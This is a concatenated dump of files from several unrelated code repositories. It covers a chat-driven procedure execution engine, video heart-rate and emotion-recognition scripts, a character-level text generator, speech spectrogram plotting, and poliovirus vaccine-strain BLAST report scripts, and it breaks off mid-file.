"""Represents an equality condition"""
def __init__(self, variable, value, negation=False):
# Variable to retrieve when evaluating
self.variable = variable
# Value to compare against
self.value = value
# Whether is is == or !=
self.negation = negation
def eval(self, variables):
"""
Evaluate the variable
Assumes that the variable to evaluate is in variables
"""
variable = variables[self.variable.variable]
value = variables[self.value.variable] if isinstance(self.value, ValueOf) else self.value
if type(value) != type(variable):
if isinstance(value, str) or isinstance(variable, str):
raise ExecutionError(f"The values {value} and {variable} cannot be compared.")
return variable != value if self.negation else variable == value
def __str__(self):
value = f"the value of {self.value.variable}" if isinstance(self.value, ValueOf) else self.value
return f"{self.variable.variable} {'!' if self.negation else '='}= {value}"
def to_nl(self):
value = f"the value of {self.value.variable}" if isinstance(self.value, ValueOf) else self.value
return f"variable {self.variable.variable} is {'not ' if self.negation else ''}equal to {value}"
def __eq__(self, other):
if not isinstance(other, type(self)):
return NotImplemented
return self.variable == other.variable and self.value == other.value and self.negation == other.negation
class ComparisonCondition(Condition):
"""Represents an comparison condition"""
def __init__(self, variable, op, value):
# Variable to retrieve when evaluating
self.variable = variable
# Value to compare against
self.value = value
# Operator to evaluate with - includes >, >=, <, <=
self.op = op
def eval(self, variables):
"""
Evaluate the variable
Assumes that the variable to evaluate is in variables
"""
variable = variables[self.variable.variable]
value = variables[self.value.variable] if isinstance(self.value, ValueOf) else self.value
if type(value) != type(variable):
if isinstance(value, str) or isinstance(variable, str):
raise ExecutionError(f"The values {value} and {variable} cannot be compared.")
if self.op == "greater than":
return variable > value
elif self.op == "less than":
return variable < value
elif self.op == "greater than or equal to":
return variable >= value
elif self.op == "less than or equal to":
return variable <= value
return False
def __str__(self):
value = f"the value of {self.value.variable}" if isinstance(self.value, ValueOf) else self.value
return f"{self.variable.variable} {comparison_ops.get(self.op)} {value}"
def to_nl(self):
value = f"the value of {self.value.variable}" if isinstance(self.value, ValueOf) else self.value
return f"variable {self.variable.variable} is {self.op} {value}"
def __eq__(self, other):
if not isinstance(other, type(self)):
return NotImplemented
return self.variable == other.variable and self.value == other.value and self.op == other.op
```
#### File: server/models/execution.py
```python
import copy
import threading
import time
from app import sio, logger
from error import *
from models import *
from helpers import *
class Execution(object):
"""
Represents an execution of a procedure
Executes the procedure in a child thread such that the server does not have to
wait for execution to finish before performing other actions - this way multiple users
can send messages at once and allow for users to stop execution of a procedure before it
finishes - allowing for stopping of infinite loops.
"""
def __init__(self, context, actions, to_emit=True):
self.context = context
self.actions = actions
self.variables = {}
self.step = 0
self.input_needed = None
self.thread_running = False
self.finished = False
self.to_emit = to_emit
self.first_message_emitted = False
def run(self, message=None):
"""
Starts execution
Execution starts essentially from two different states:
1. From the beginning of a procedure
2. After asking for user input, execution starts again with user's next message as input
"""
if self.input_needed and message:
# If input was needed, try to parse message and if it's a number try to parse number
number = parse_number(message)
self.variables[self.input_needed] = number if number is not None else message
logger.debug(f"[{self.context.sid}][Execution] Variables after getting input: {str(self.variables)}")
self.input_needed = None
self.thread = threading.Thread(target=self.advance)
# Means if the main thread stops (the server), this thread will also stop
self.thread.daemon = True
self.thread_running = True
if not self.first_message_emitted:
self.emit("response", { "message": "Procedure started running.", "state": self.context.state, "speak": False })
logger.debug(f"[{self.context.sid}][Execution] Procedure started running.")
self.first_message_emitted = True
logger.debug(f"[{self.context.sid}][Execution] Thread started running.")
self.thread.start()
def stop(self):
"""Stop execution"""
self.thread_running = False
def finish(self, message=None):
"""Finish up execution"""
self.stop()
self.finished = True
# Transition from "running" state to "home" state
self.context.transition("finish")
self.context.execution = None
if message is not None:
logger.debug(f"[{self.context.sid}][Execution] Execution stopped with message: {message}")
self.emit("response", { "message": message, "state": self.context.state })
def advance(self):
"""Continue execution"""
while self.thread_running and not self.finished and self.step < len(self.actions):
action = self.actions[self.step]
try:
# Tries to evaluate action
self.evaluate_action(action)
self.step += 1
sio.sleep(0.1)
if self.input_needed:
# If input is needed (i.e. reaches a GetUserInputAction), stop execution and ask user for input
self.stop()
return
except KeyError as e:
# Error when variable referenced does not exist
logger.debug(f"[{self.context.sid}][Execution] KeyError: {e.args[0]}")
self.finish(f"Error occured while running. Variable {e.args[0]} did not exist when I was {action.to_nl()}.")
return
except ExecutionError as e:
# Error that happens during execution like infinite loops, etc.
logger.debug(f"[{self.context.sid}][Execution] ExecutionError: {e.message}")
self.finish(e.message)
return
if self.step >= len(self.actions):
break
if not self.finished:
self.finish("Procedure finished running.")
def emit(self, event, data):
"""Emit or send message to user via sockets"""
if not self.to_emit:
return
try:
message = f" with the message: {data['message']}" if "message" in data else "."
logger.debug(f"[{self.context.sid}][Execution] Emitting '{event}'{message}")
sio.emit(event, data, room=str(self.context.sid))
except RuntimeError as e:
logger.debug(f"[{self.context.sid}][Execution] RuntimeError: {str(e)}")
if not str(e).startswith("Working outside of request context."):
raise e
def evaluate_action(self, action):
"""Evaluates an action"""
logger.debug(f"[{self.context.sid}][Execution][Evaluating] Evaluating action {str(action)} on step {self.step}.")
if isinstance(action, SayAction):
phrase = action.phrase
if isinstance(action.phrase, ValueOf):
variable = action.phrase.variable
phrase = f"The value of {variable} is \"{self.variables[variable]}\"."
logger.debug(f"[{self.context.sid}][Execution][Evaluating] Saying '{phrase}'")
self.emit("response", { "message": phrase, "state": self.context.state })
self.context.add_message(action.phrase)
elif isinstance(action, PlaySoundAction):
logger.debug(f"[{self.context.sid}][Execution][Evaluating] Playing sound file {action.sound}.")
self.emit("playSound", { "sound": action.sound, "state": self.context.state })
elif isinstance(action, GetUserInputAction):
logger.debug(f"[{self.context.sid}][Execution][Evaluating] Getting user input and setting as {action.variable}.")
self.input_needed = action.variable
if action.prompt:
self.emit("response", { "message": action.prompt, "state": self.context.state })
elif isinstance(action, CreateVariableAction):
self.variables[action.variable] = self.variables[action.value.variable] if isinstance(action.value, ValueOf) else action.value
logger.debug(f"[{self.context.sid}][Execution][Evaluating] Creating variable {action.variable} with value {self.variables[action.variable]}.")
logger.debug(f"[{self.context.sid}][Execution][Evaluating] Variables after creating variable: {str(self.variables)}")
elif isinstance(action, SetVariableAction):
if action.variable in self.variables:
self.variables[action.variable] = self.variables[action.value.variable] if isinstance(action.value, ValueOf) else action.value
logger.debug(f"[{self.context.sid}][Execution][Evaluating] Setting variable {action.variable} with value {self.variables[action.variable]}.")
logger.debug(f"[{self.context.sid}][Execution][Evaluating] Variables after setting variable: {str(self.variables)}")
else:
logger.debug(f"[{self.context.sid}][Execution][Evaluating] Variable {action.variable} not found.")
raise KeyError(action.variable)
elif isinstance(action, AddToVariableAction) or isinstance(action, SubtractFromVariableAction):
value = self.variables.get(action.variable)
if action.variable in self.variables:
old = self.variables[action.variable]
factor = 1 if isinstance(action, AddToVariableAction) else -1
if isinstance(action.value, float) or isinstance(action.value, int):
self.variables[action.variable] += factor * action.value
elif isinstance(action.value, ValueOf):
self.variables[action.variable] += factor * self.variables[action.value.variable]
new = self.variables[action.variable]
if isinstance(action, AddToVariableAction):
logger.debug(f"[{self.context.sid}][Execution][Evaluating] Incrementing variable {action.variable} from {old} to {new}.")
logger.debug(f"[{self.context.sid}][Execution][Evaluating] Variables after incrementing variable: {str(self.variables)}")
else:
logger.debug(f"[{self.context.sid}][Execution][Evaluating] Decrementing variable {action.variable} from {old} to {new}.")
logger.debug(f"[{self.context.sid}][Execution][Evaluating] Variables after decrementing variable: {str(self.variables)}")
else:
logger.debug(f"[{self.context.sid}][Execution][Evaluating] Variable {action.variable} not found.")
raise KeyError(action.variable)
elif isinstance(action, ConditionalAction):
res = action.condition.eval(self.variables)
logger.debug(f"[{self.context.sid}][Execution][Evaluating] Evaluating condition for if statement.")
logger.debug(f"[{self.context.sid}][Execution][Evaluating] Variables when evaluating condition: {str(self.variables)}")
logger.debug(f"[{self.context.sid}][Execution][Evaluating] Condition for if statement ({str(action.condition)}) is " + ("true" if res else "false"))
self.actions[self.step:self.step + 1] = action.actions[res]
self.step -= 1
elif isinstance(action, LoopAction):
if (action.loop == "until" and isinstance(action.condition, UntilStopCondition)):
res = False
else:
res = action.condition.eval(self.variables)
logger.debug(f"[{self.context.sid}][Execution][Evaluating] Evaluating condition for {action.loop} loop.")
logger.debug(f"[{self.context.sid}][Execution][Evaluating] Variables when evaluating condition: {str(self.variables)}")
logger.debug(f"[{self.context.sid}][Execution][Evaluating] Condition for {action.loop} loop ({str(action.condition)}) is " + ("true" if res else "false"))
if (action.loop == "until" and not res) or (action.loop == "while" and res):
self.actions[self.step:self.step] = action.actions
self.step -= 1
else:
raise NotImplementedError
class InternalExecution(Execution):
"""Execution that is ran internally without user knowing - used in user study to check advanced scenarios"""
def __init__(self, context, actions, inputs):
super().__init__(context, actions)
self.inputs = inputs
self.iterinputs = iter(inputs)
self.emits = []
self.original_length = len(actions)
def advance(self):
while self.step < len(self.actions):
action = self.actions[self.step]
try:
self.evaluate_action(action)
self.step += 1
if self.input_needed:
message = next(self.iterinputs)
number = parse_number(message)
self.variables[self.input_needed] = number if number is not None else message
logger.debug(f"[{self.context.sid}][Execution] Variables after getting input: {str(self.variables)}")
self.input_needed = None
except KeyError as e:
logger.debug(f"[{self.context.sid}][Execution] KeyError: {e.args[0]}")
return "KeyError"
except ExecutionError as e:
logger.debug(f"[{self.context.sid}][Execution] ExecutionError: {e.message}")
return "ExecutionError"
except StopIteration as e:
logger.debug(f"[{self.context.sid}][Execution] StopIteration: Too many inputs needed.")
return "StopIteration"
if len(self.actions) > self.original_length * 100:
logger.debug(f"[{self.context.sid}][Execution] Infinite loop detected.")
return "InfiniteLoop"
self.finish()
return None
def run(self):
logger.debug(f"[{self.context.sid}][Execution] Starting to check procedure.")
logger.debug(f"[{self.context.sid}][Execution] Actions: {[str(a) for a in self.actions]}")
logger.debug(f"[{self.context.sid}][Execution] Inputs: {self.inputs}.")
return self.advance()
def finish(self):
logger.debug(f"[{self.context.sid}][Execution] Finishing checking procedure.")
logger.debug(f"[{self.context.sid}][Execution] Emits: {self.emits}.")
self.finished = True
def emit(self, event, data):
"""Add to list of emits instead of actually sending responses to user"""
self.emits.append((event, data))
```
|
{
"source": "jessvb/Heart-rate-from-video",
"score": 3
}
|
#### File: jessvb/Heart-rate-from-video/heart-rate-post-process.py
```python
import cv2
import numpy as np
import sys
import time
from classes.process import Process
from classes.video import Video
import pandas as pd
import os
################################################################################
######### Change these depending on where your recordings are located ##########
rec_dir = 'recordings/'
################################################################################
def getVideoHeartRate(video,process,output_name):
frame = np.zeros((10,10,3),np.uint8)
bpm = 0
# for exporting to csv
bpm_all = []
timestamps = []
# Run the loop
process.reset()
video.start()
max_frame_num = int(video.cap.get(cv2.CAP_PROP_FRAME_COUNT))
iter_percent = 0 # for printing percent done
hasNextFrame = True
while hasNextFrame == True:
frame = video.get_frame()
if frame is not None:
process.frame_in = frame
process.run()
f_fr = process.frame_ROI #get the face
bpm = process.bpm #get the bpm change over the time
f_fr = cv2.cvtColor(f_fr, cv2.COLOR_RGB2BGR)
f_fr = np.transpose(f_fr,(0,1,2)).copy()
bpm_all.append(bpm)
curr_frame_num = video.cap.get(cv2.CAP_PROP_POS_FRAMES)
timestamps.append(curr_frame_num/video.fps)
else:
hasNextFrame = False
# every so often, show percent done
percent_done = curr_frame_num/max_frame_num*100
if (percent_done > iter_percent):
print('current frame: %.0f' % curr_frame_num)
print('percent done: %.1f%%' % percent_done)
iter_percent += 20
# Export predicted bpm to .csv format
df = pd.DataFrame({'BPM': bpm_all, 'TIMESTAMP_SEC': timestamps})
df.to_csv(os.path.join('output', 'heartrate_' + output_name + '.csv'), sep=',', index=False)
print('🎉 Done! 🎉')
print('See the output file:')
print('output/' + 'heartrate_' + output_name + '.csv')
if __name__ == '__main__':
# Loop through specific files and analyze their video
files_in_dir = [f for f in os.listdir(rec_dir) if os.path.isfile(os.path.join(rec_dir, f))]
i = 0
for f in files_in_dir:
video = Video()
process = Process()
if f.split('.')[1] == 'avi' or f.split('.')[1] == 'mp4':
video.dirname = os.path.join(rec_dir,f)
output_name = f.split('.')[0]
print(f'Reading from {video.dirname}')
getVideoHeartRate(video, process, output_name)
i += 1
print(f"""Number of files to go: {len(files_in_dir) - i}
Percent files done: {i/len(files_in_dir)*100}\n""")
```
|
{
"source": "jessvb/lstm_model_loader",
"score": 3
}
|
#### File: jessvb/lstm_model_loader/max-likelihood.py
```python
import sys
import json
models = {
'aliceInWonderland':'max-likelihood-models/AiW_model.json',
'drSeuss': 'max-likelihood-models/drSeuss_.json',
'hamlet': 'max-likelihood-models/hamlet_model.json',
'harryPotter': 'max-likelihood-models/harryPotter_model.json',
'hungerGames': 'max-likelihood-models/hungerGames_model.json',
'nancy': 'max-likelihood-models/nancy_model.json',
'narnia': 'max-likelihood-models/narnia_model.json',
'shakespeare': 'max-likelihood-models/shakespeare_model.json',
'tomSawyer': 'max-likelihood-models/tomSawyer_model.json',
'wizardOfOz': 'max-likelihood-models/WoOz_model.json',
}
from random import random
def generate_letter(lm, history, order):
"""Samples the model's probability distribution and returns the letter"""
history = history[-order:]
dist = lm[history]
x = random()
for c,v in dist:
x = x - v
if x <= 0: return c
def generate_text(lm, order, nletters=1000):
"""The original generate text function. The seed text is just the prefix used in training"""
history = "~" * order
out = []
for i in range(nletters):
c = generate_letter(lm, history, order)
history = history[-order:] + c
out.append(c)
return "".join(out)
def gen_text (lm, seed, nletters=1000):
"""Same as generate_text, except now handles keys its not seen before"""
for k in lm.keys():
order = len(k)
if len(seed) < order:
seed = ' ' * order + seed
history = seed[-order:]
out = []
for i in range(nletters):
if history not in lm:
if history.lower() in lm:
history = history.lower()
break
def find_suitable_replacement():
for removed_letters in range (1, order):
for k, v in lm.items():
if k[-order+removed_letters:] == history[-order+removed_letters:]:
return k
history = find_suitable_replacement()
c = generate_letter(lm, history, order)
history = history[-order+1:] + c
out.append(c);
return "".join(out)
# loads the saved model
with open(models[sys.argv[1]]) as f:
model = json.loads(f.read())
# uses the loaded model to generate the results
results = gen_text(model, sys.argv[2], nletters=int(sys.argv[3]))
print(results)
```
|
{
"source": "jessvb/Multimodal-Emotion-Recognition",
"score": 2
}
|
#### File: jessvb/Multimodal-Emotion-Recognition/video_er_from_file.py
```python
from __future__ import division
import numpy as np
import pandas as pd
import time
from time import sleep
import re
import os
import requests
import argparse
from collections import OrderedDict
### Image processing ###
import cv2
from scipy.ndimage import zoom
from scipy.spatial import distance
import imutils
from scipy import ndimage
import dlib
from imutils import face_utils
### Model ###
from tensorflow.keras.models import load_model
from tensorflow.keras import backend as K
################################################################################
########## Change this depending on where your recordings are located ##########
################################################################################
rec_dir = 'recordings/'
################################################################################
def getVideoEmotions(input_video_filepath,output_name):
# Start video capute. 0 = Webcam, 1 = Video file, -1 = Webcam for Web
video_capture = cv2.VideoCapture(input_video_filepath)
# Image shape
shape_x = 48
shape_y = 48
input_shape = (shape_x, shape_y, 1)
# We have 7 emotions
nClasses = 7
# Timer until the end of the recording
curr_frame_num = 0
# Initiate Landmarks
(lStart, lEnd) = face_utils.FACIAL_LANDMARKS_IDXS["left_eye"]
(rStart, rEnd) = face_utils.FACIAL_LANDMARKS_IDXS["right_eye"]
(nStart, nEnd) = face_utils.FACIAL_LANDMARKS_IDXS["nose"]
(mStart, mEnd) = face_utils.FACIAL_LANDMARKS_IDXS["mouth"]
(jStart, jEnd) = face_utils.FACIAL_LANDMARKS_IDXS["jaw"]
(eblStart, eblEnd) = face_utils.FACIAL_LANDMARKS_IDXS["left_eyebrow"]
(ebrStart, ebrEnd) = face_utils.FACIAL_LANDMARKS_IDXS["right_eyebrow"]
# Load the pre-trained X-Ception model
model = load_model('Models/video.h5')
# Load the face detector
face_detect = dlib.get_frontal_face_detector()
# Load the facial landmarks predictor
predictor_landmarks = dlib.shape_predictor("Models/face_landmarks.dat")
# Prediction vector
predictions = []
# Timer for length of video
max_frame_num = int(video_capture.get(cv2.CAP_PROP_FRAME_COUNT))
fps = video_capture.get(cv2.CAP_PROP_FPS)
frames_btwn = int(fps/3) # measure emotion every 1/3 of a sec
# angry_0 = []
# disgust_1 = []
# fear_2 = []
# happy_3 = []
# sad_4 = []
# surprise_5 = []
# neutral_6 = []
# Initialize arrays for saving predictions
emotions = []
face_indices = []
timestamps = []
# Analyze video until the end
curr_frame_num = 0
iter_percent = 0 # for printing
while curr_frame_num < max_frame_num:
# Set the frame to be read
video_capture.set(cv2.CAP_PROP_POS_FRAMES, curr_frame_num)
# Capture the frame number set above (frame here means image)
ret, frame = video_capture.read()
# Face index, face by face
face_index = 0
# Image to gray scale
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# All faces detected
rects = face_detect(gray, 1)
# For each detected face
for (i, rect) in enumerate(rects):
# Identify face coordinates
(x, y, w, h) = face_utils.rect_to_bb(rect)
face = gray[y:y+h,x:x+w]
# Zoom on extracted face (if face extracted)
if face.shape[0] and face.shape[1]:
face = zoom(face, (shape_x / face.shape[0],shape_y / face.shape[1]))
# Cast type float
face = face.astype(np.float32)
# Scale the face
face /= float(face.max())
face = np.reshape(face.flatten(), (1, 48, 48, 1))
# Make Emotion prediction on the face, outputs probabilities
prediction = model.predict(face)
# Most likely emotion (as an index)
prediction_result = np.argmax(prediction)
# Convert emotion index to an emotion (string)
emotion = ''
if (prediction_result == 0):
emotion = 'Angry'
elif (prediction_result == 1):
emotion = 'Disgust'
elif (prediction_result == 2):
emotion = 'Fear'
elif (prediction_result == 3):
emotion = 'Happy'
elif (prediction_result == 4):
emotion = 'Sad'
elif (prediction_result == 5):
emotion = 'Surprise'
elif (prediction_result == 6):
emotion = 'Neutral'
else:
emotion = 'Unknown emotion'
else:
emotion = 'No face extracted'
# save results for later
emotions.append(emotion)
face_indices.append(face_index)
timestamps.append(curr_frame_num/fps)
# every so often, show percent done
percent_done = curr_frame_num/max_frame_num*100
if (percent_done > iter_percent):
print('current frame: %.0f' % curr_frame_num)
print('percent done: %.1f%%' % percent_done)
iter_percent += 20
# increment frame
curr_frame_num += frames_btwn
video_capture.release()
# # Export predicted emotions to .csv format
df = pd.DataFrame({'EMOTION': emotions, 'FACE_INDEX': face_indices, 'TIMESTAMP_SEC': timestamps})
df.to_csv(os.path.join('output', 'video_emotions_' + output_name + '.csv'), sep=',', index=False)
print('🎉 Done! 🎉')
print('See the output file:')
print('output/' + 'video_emotions_' + output_name + '.csv')
if __name__ == '__main__':
# Loop through specific files and analyze their video
files_in_dir = [f for f in os.listdir(rec_dir) if os.path.isfile(os.path.join(rec_dir, f))]
i = 0
for f in files_in_dir:
if f.split('.')[1] == 'avi' or f.split('.')[1] == 'mp4':
input_video_filepath = os.path.join(rec_dir,f)
print(f'Reading from {input_video_filepath}')
output_name = f.split('.')[0]
getVideoEmotions(input_video_filepath, output_name)
i += 1
print(f"""Number of files to go: {len(files_in_dir) - i}
Percent files done: {i/len(files_in_dir)*100}\n""")
```
|
{
"source": "jessvb/speech-utils",
"score": 3
}
|
#### File: jessvb/speech-utils/create_spectrogram.py
```python
import parselmouth
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
boyfile = "data_highpitched/train/boy/am/8z1a.wav"
girlfile = "data_highpitched/train/girl/is/8z1a.wav"
manfile = "data_wav/train/man/ff/8z1a.wav"
womanfile = "data_wav/train/woman/cg/8z1a.wav"
highmanfile = "data_highpitched/train/man/ff/8z1a.wav"
highwomanfile = "data_highpitched/train/woman/cg/8z1a.wav"
sns.set() # Use seaborn's default style to make attractive graphs
# Plot nice figures using Python's "standard" matplotlib library
sndboy = parselmouth.Sound(boyfile)
sndgirl = parselmouth.Sound(girlfile)
sndman = parselmouth.Sound(manfile)
sndwoman = parselmouth.Sound(womanfile)
sndhighman = parselmouth.Sound(highmanfile)
sndhighwoman = parselmouth.Sound(highwomanfile)
#plt.figure()
#plt.plot(snd.xs(), snd.values.T)
#plt.xlim([snd.xmin, snd.xmax])
#plt.xlabel("time [s]")
#plt.ylabel("amplitude")
#plt.show() # or plt.savefig("sound.png"), or plt.savefig("sound.pdf")
def draw_spectrogram(spectrogram, dynamic_range=70):
X, Y = spectrogram.x_grid(), spectrogram.y_grid()
sg_db = 10 * np.log10(spectrogram.values)
plt.pcolormesh(X, Y, sg_db, vmin=sg_db.max() - dynamic_range, cmap='afmhot')
plt.ylim([spectrogram.ymin, spectrogram.ymax])
plt.xlabel("time [s]")
plt.ylabel("frequency [Hz]")
def draw_intensity(intensity):
plt.plot(intensity.xs(), intensity.values.T, linewidth=3, color='w')
plt.plot(intensity.xs(), intensity.values.T, linewidth=1)
plt.grid(False)
plt.ylim(0)
plt.ylabel("intensity [dB]")
#intensity = snd.to_intensity()
#spectrogram = snd.to_spectrogram()
#plt.figure()
#draw_spectrogram(spectrogram)
#plt.twinx()
#draw_intensity(intensity)
#plt.xlim([snd.xmin, snd.xmax])
#plt.show() # or plt.savefig("spectrogram.pdf")
def draw_pitch(pitch):
# Extract selected pitch contour, and
# replace unvoiced samples by NaN to not plot
pitch_values = pitch.selected_array['frequency']
pitch_values[pitch_values==0] = np.nan
plt.plot(pitch.xs(), pitch_values, 'o', markersize=5, color='w')
plt.plot(pitch.xs(), pitch_values, 'o', markersize=2)
plt.grid(False)
plt.ylim(0, pitch.ceiling)
plt.ylabel("fundamental frequency [Hz]")
def create_spec_with_pitch(infile):
snd = parselmouth.Sound(infile)
pitch = snd.to_pitch()
# If desired, pre-emphasize the sound fragment before calculating the spectrogram
pre_emphasized_snd = snd.copy()
pre_emphasized_snd.pre_emphasize()
spectrogram = pre_emphasized_snd.to_spectrogram(window_length=0.03, maximum_frequency=8000)
plt.figure()
draw_spectrogram(spectrogram)
plt.twinx()
draw_pitch(pitch)
plt.xlim([snd.xmin, snd.xmax])
plt.show() # or plt.savefig("spectrogram_0.03.pdf")
create_spec_with_pitch(boyfile)
create_spec_with_pitch(girlfile)
create_spec_with_pitch(manfile)
create_spec_with_pitch(womanfile)
create_spec_with_pitch(highmanfile)
create_spec_with_pitch(highwomanfile)
```
|
{
"source": "JessvLS/project_spring_2020",
"score": 2
}
|
#### File: process_sample/rules/generate_report.py
```python
import os
from Bio import SeqIO
import collections
import sys
import argparse
import datetime
import subprocess
parser = argparse.ArgumentParser(description='Generate blast report.')
parser.add_argument("--consensus", action="store", type=str, dest="consensus")
parser.add_argument("--blast_db", action="store", type=str, dest="blast_db")
parser.add_argument("--detailed_blast_db", action="store", type=str, dest="detailed_blast_db")
parser.add_argument("--blast_file", action="store", type=str, dest="blast_file")
parser.add_argument("--detailed_blast_file", action="store", type=str, dest="detailed_blast_file")
parser.add_argument("--output_report", action="store", type=str, dest="output_report")
parser.add_argument("--output_seqs", action="store", type=str, dest="output_seqs")
parser.add_argument("--sample", action="store", type=str, dest="sample")
args = parser.parse_args()
def parse_blast_for_top_hit(blast_csv):
hits = []
with open(blast_csv, "r") as f:
for l in f:
tokens= l.rstrip('\n').split(',')
query = tokens[0]
hit = tokens[1]
score= tokens[-1]
hits.append((hit,score,l.rstrip('\n')))
top = sorted(hits, key = lambda x : float(x[1]), reverse = True)[0]
return(top[2].split(','))
top_hit = parse_blast_for_top_hit(args.blast_file)
detailed_top_hit = parse_blast_for_top_hit(args.detailed_blast_file)
query,subject,pid,length,mismatch,gapopen,qstart,qend,sstart,send,evalue,bitscore= top_hit
query,subject_detailed,pid_detailed,length_detailed,mismatch_detailed,gapopen_detailed,qstart_detailed,qend_detailed,sstart_detailed,send_detailed,evalue_detailed,bitscore_detailed= detailed_top_hit
seq_dict={
"Sabin1_vacc":"GGGTTAGGTCAGATGCTTGAAAGCATGATTGACAACACAGTCCGTGAAACGGTGGGGGCGGCAACGTCTAGAGACGCTCTCCCAAACACTGAAGCCAGTGGACCAGCACACTCCAAGGAAATTCCGGCACTCACCGCAGTGGAAACTGGGGCCACAAATCCACTAGTCCCTTCTGATACAGTGCAAACCAGACATGTTGTACAACATAGGTCAAGGTCAGAGTCTAGCATAGAGTCTTTCTTCGCGCGGGGTGCATGCGTGGCCATTATAACCGTGGATAACTCAGCTTCCACCAAGAATAAGGATAAGCTATTTACAGTGTGGAAGATCACTTATAAAGATACTGTCCAGTTACGGAGGAAATTGGAGTTCTTCACCTATTCTAGATTTGATATGGAATTTACCTTTGTGGTTACTGCAAATTTCACTGAGACTAACAATGGGCATGCCTTAAATCAAGTGTACCAAATTATGTACGTACCACCAGGCGCTCCAGTGCCCGAGAAATGGGACGACTACACATGGCAAACCTCATCAAATCCATCAATCTTTTACACCTACGGAACAGCTCCAGCCCGGATCTCGGTACCGTATGTTGGTATTTCGAACGCCTATTCACACTTTTACGACGGTTTTTCCAAAGTACCACTGAAGGACCAGTCGGCAGCACTAGGTGACTCCCTCTATGGTGCAGCATCTCTAAATGACTTCGGTATTTTGGCTGTTAGAGTAGTCAATGATCACAACCCGACCAAGGTCACCTCCAAAATCAGAGTGTATCTAAAACCCAAACACATCAGAGTCTGGTGCCCGCGTCCACCGAGGGCAGTGGCGTACTACGGCCCTGGAGTGGATTACAAGGATGGTACGCTTACACCCCTCTCCACCAAGGATCTGACCACATAT",
"Sabin2_vacc":"GGAATTGGTGACATGATTGAGGGGGCCGTTGAAGGGATTACTAAAAATGCATTGGTTCCCCCGACTTCCACCAATAGCCTGCCTGACACAAAGCCGAGCGGTCCAGCCCACTCCAAGGAGATACCTGCATTGACAGCCGTGGAGACAGGGGCTACCAATCCGTTGGTGCCTTCGGACACCGTGCAAACGCGCCATGTCATCCAGAGACGAACGCGATCAGAGTCCACGGTTGAGTCATTCTTTGCAAGAGGGGCTTGCGTGGCTATCATTGAGGTGGACAATGATGCACCGACAAAGCGCGCCAGCAGATTGTTTTCGGTTTGGAAAATAACTTACAAAGATACTGTTCAACTGAGACGCAAACTGGAATTTTTCACATATTCGAGATTTGACATGGAGTTCACTTTTGTGGTCACCTCAAACTACATTGATGCAAATAACGGACATGCATTGAACCAAGTTTATCAGATAATGTATATACCACCCGGAGCACCTATCCCTGGTAAATGGAATGACTATACGTGGCAGACGTCCTCTAACCCGTCGGTGTTTTACACCTATGGGGCGCCCCCAGCAAGAATATCAGTGCCCTACGTGGGAATTGCTAATGCGTATTCCCACTTTTATGATGGGTTTGCAAAAGTACCACTAGCGGGTCAAGCCTCAACTGAAGGCGATTCGTTGTACGGTGCTGCCTCACTGAATGATTTTGGATCACTGGCTGTTCGCGTGGTAAATGATCACAACCCCACGCGGCTCACCTCCAAGATCAGAGTGTACATGAAGCCAAAGCATGTCAGAGTCTGGTGCCCACGACCTCCACGAGCAGTCCCATACTTCGGACCAGGTGTTGATTATAAAGATGGGCTCACCCCACTACCAGAAAAGGGATTAACGACTTAT",
"Sabin3_vacc":"ATTGAAGATTTGACTTCTGAAGTTGCACAGGGCGCCCTAACTTTGTCACTCCCGAAGCAACAGGATAGCTTACCTGATACTAAGGCCAGTGGCCCGGCGCATTCCAAGGAGGTACCTGCACTCACTGCAGTCGAGACTGGAGCCACCAATCCTCTGGCACCATCCGACACAGTTCAAACGCGCCACGTAGTCCAACGACGCAGCAGGTCAGAGTCCACAATAGAATCATTCTTCGCACGCGGGGCGTGCGTCGCTATTATTGAGGTGGACAATGAACAACCAACCACCCGGGCACAGAAACTATTTGCCATGTGGCGCATTACATACAAAGATACAGTGCAGTTGCGCCGTAAGTTGGAGTTTTTCACATACTCTCGTTTTGACATGGAATTCACCTTCGTGGTAACCGCCAACTTCACCAACGCTAATAATGGGCATGCACTCAACCAGGTGTACCAGATAATGTACATCCCCCCAGGGGCACCCACACCAAAGTCATGGGACGACTACACTTGGCAAACATCTTCCAACCCGTCCATATTTTACACCTATGGGGCTGCCCCGGCGCGAATCTCAGTGCCATACGTGGGGTTAGCCAATGCTTACTCGCACTTTTACGACGGCTTCGCCAAGGTGCCATTGAAGACAGATGCCAATGACCAGATTGGTGATTCCTTGTACAGCGCCATGACAGTTGATGACTTTGGTGTATTGGCAGTTCGTGTTGTCAATGATCACAACCCCACTAAAGTAACCTCCAAAGTCCGCATTTACATGAAACCCAAACACGTACGTGTCTGGTGCCCTAGACCGCCGCGCGCGGTACCTTATTATGGACCAGGGGTGGACTATAGGAACAACTTGGACCCCTTATCTGAGAAAGGTTTGACCACATAT"
}
for record in SeqIO.parse(args.blast_db,"fasta"):
if record.id==subject:
seq_dict[record.id]=record.seq
if subject!=subject_detailed:
for record in SeqIO.parse(args.detailed_blast_db,"fasta"):
if record.id==subject_detailed:
seq_dict[record.id]=record.seq
for record in SeqIO.parse(args.consensus,"fasta"):
seq_dict[record.id]=record.seq
fw= open(args.output_seqs,"w")
for i in seq_dict:
fw.write(">{}\n{}\n".format(i, seq_dict[i]))
fw.close()
fw=open(args.output_report,"w")
fw.write("## Report for sample: {}\n\n".format(args.sample))
now=datetime.datetime.now()
fw.write("{}/{}/{}\n\n".format(now.year,now.month,now.day))
fw.write("The type of virus that sample {} sequence is most similar to is {}.\n\n".format(args.sample, subject.split('_')[0]))
fw.write("Percentage ID: {}\n\nLength: {}\n\nNo. Mismatch: {}\n\nNo. Gap Opening: {}\n\nE-value: {}\n\n".format(pid,length,mismatch,gapopen,evalue))
fw.write("The closest hit in the detailed database to sample {} is {}.\n\n".format(args.sample, subject_detailed))
fw.write("Percentage ID: {}\n\nLength: {}\n\nNo. Mismatch: {}\n\nNo. Gap Opening: {}\n\nE-value: {}\n\n".format(pid_detailed,length_detailed,mismatch_detailed,gapopen_detailed,evalue_detailed))
fw.close()
```
#### File: process_sample/rules/mask_low_coverage.py
```python
import csv
import sys
import argparse
from Bio import SeqIO
def parse_args():
parser = argparse.ArgumentParser(description='Trim primers.')
parser.add_argument("--cns", action="store", type=str, dest="cns")
parser.add_argument("--paf", action="store", type=str, dest="paf")
parser.add_argument("--min_coverage", action="store", type=int, dest="min_coverage")
parser.add_argument("--masked_cns", action="store", type=str, dest="masked_cns")
return parser.parse_args()
def load_cns(cns):
